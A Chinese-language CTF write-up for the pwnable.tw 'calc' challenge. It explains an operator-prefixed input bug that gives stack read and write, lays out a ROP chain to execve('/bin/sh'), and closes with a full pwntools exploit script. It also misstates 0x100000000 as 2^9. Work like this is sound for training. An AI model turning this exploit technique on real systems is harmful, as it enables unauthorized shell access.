Pwnable.tw calc
这题的漏洞还是挺有意思的
先逆向分析一下binary的逻辑
看calc函数
通过get_expr获得输入,会过滤掉除了+,-,*,/,%和数字以外的字符
再传入parse_expr处理
注意用于存放表达式的buffer每次都会清空,而且有canary保护
再看parse_expr函数
主要的逻辑是解析表达式,把操作符 放入s[v8]
把操作数放入a2,这里需要注意的是a2的第一个元素是操作数的个数,之后才依次是各操作数
然后把a2和s[v8]传入eval中计算
eval函数
这里的a1就是前面的a2
所以相当于 a2[a2[0]-1] op= a2[a2[0]] 得到计算结果
一直到这里都没有看到什么明显的洞
参考了别人的wp:
http://dogewatch.github.io/2017/04/10/pwnable.tw-Part1/
http://www.tuicool.com/articles/VNzqea3
问题出在当输入的表达式是以运算符开头的比如“+300”时
此时数组a2的内容是 a2[0]=1,a2[1]=300
运算后的结果是a2[0]=301,a2[1]=300
更进一步,如果我们的输入是“+300+1”
那么进过第二次计算,实际执行的是 a2[300]=a2[300]+1
相当于可以执行栈上的任意写,由于并不是通过溢出来写的,因此canary无法提供防护
但要劫持控制流还需要泄露栈地址
看calc中的printf('%d',v2[v1-1]),v2是栈上的数组,v1是上面的a2[0],是我们可控的,因此这里可以执行栈上的任意读,就可以泄露栈的信息
要泄露栈上的信息还要弄清楚栈的具体结构,通过阅读calc的汇编和GDB调试,可以得到如下图的结构
因此输入+361 就可以泄露出返回地址
由于开启了NX,不能直接执行shellcode,需要通过ROP劫持控制流,而且并没有动态链接库,不能使用GOT 调sys函数,还是只能通过int 80h进行系统调用
sys_execv 需要的参数
eax=0xb ebx 指向 “/bin/sh” ecx=0 edx=0
通过ROPgadget查找合适的指令,需要构造这样的栈
370 “/sh”
369 "/bin"
368 int 80h #8049a21
367 ebx的值 #通过泄露栈上的内容计算得到
366 0x0
365 0x0
364 pop edx; pop exc; pop ebx; ret #80701d0
363 dec,eax; ret #8065773
362 0x0
361(返回地址)mov eax,0xc; pop edi; ret #808f936
分析清楚了要构造的场景,剩下的就靠我们通过输入的畸形表达式来计算并设置initpool的361~370这十个栈单元。对于每一个栈单元,我们首先获取其内的值,而后计算该值与目标值的差,最后相减即可。比如我们要将362位置上的值变为11,首先输入“+362”得到当前362栈单元的值135184896,然后计算135184896-11=135184885,最后输入“+362-135184885”将栈内值修改为11。
比较麻烦的是ebx的值的就算,这只能通过相对偏移进行计算。我们可以从栈上泄露出main的ebp,main的ebp同calc函数的返回地址之间是main的栈空间,ebx同calc函数的返回地址之间的偏移是32字节(369-361)。因此需要知道main函数的栈有多大。通过main的汇编,观察ebp和esp的操作
.text:08049453 mov ebp, esp
.text:08049455 and esp, 0FFFFFFF0h
.text:08049458 sub esp, 10h
根据泄露出的ebp,得到其栈空间应该为24byte。这边还有一个问题,ebp应该是无符号数,但是被当作有符号数输出,输出的是负数,需要加上0x100000000(2^9)才是无符号数的真实值。得到ebx的值之后只需要利用上述的任意写漏洞写栈上的空间即可。
后来发现这边还有一个坑。就是写ebx的时候如果使用加上0x100000000后的值作为main_ebp,那么ebx的目标值会很大,输入+367+(目标值-diff)后会产生一个溢出,导致最后实际的值并不是我们想要的。此时依旧可以用输出值(一个负数)作为main_ebp,这样可以避免溢出,并且正确设置ebx的值
最终的利用脚本:
from pwn import *
HOST = 'chall.pwnable.tw'
PORT = 10100
con=remote(HOST,PORT)
context.log_level="debug"
con.recv(1024)
stack=[0x808f936,0x0,0x8065773,0x80701d0,0,0,0,0x8049a21,u32("/bin"),u32("/sh\x00")]
def get_ebx():
con.sendline("+360")
i=con.recv()
main_ebp=int(i)+0x100000000
#size=main_ebp-(main_ebp& 0xFFFFFFF0-16)
size=24 #size is 24
ebx=main_ebp-(size+4)+4*8
print hex(ebx)#usigned value
ebx=int(i)-(size+4)+4*8
print hex(ebx) #signed value
return ebx
def set_val(index,val):
con.sendline("+"+str(index))
val1=int(con.recv(1024))
print val1
diff=val-val1
if(diff<0):
payload="+"+str(index)+str(diff)
else:
payload="+"+str(index)+"+"+str(diff)
con.sendline(payload)
con.recv(1024)
print "set",str(index)," : ",hex(val)
if(index==367):
con.sendline("+"+str(index))
val2=int(con.recv(1024))+0x100000000
print hex(val2)
stack[6]=get_ebx()
print stack
base=361
for x in stack:
set_val(base,x)
base+=1
con.sendline("aaaaa")
con.sendline("bbbbb")
con.interactive("shell:")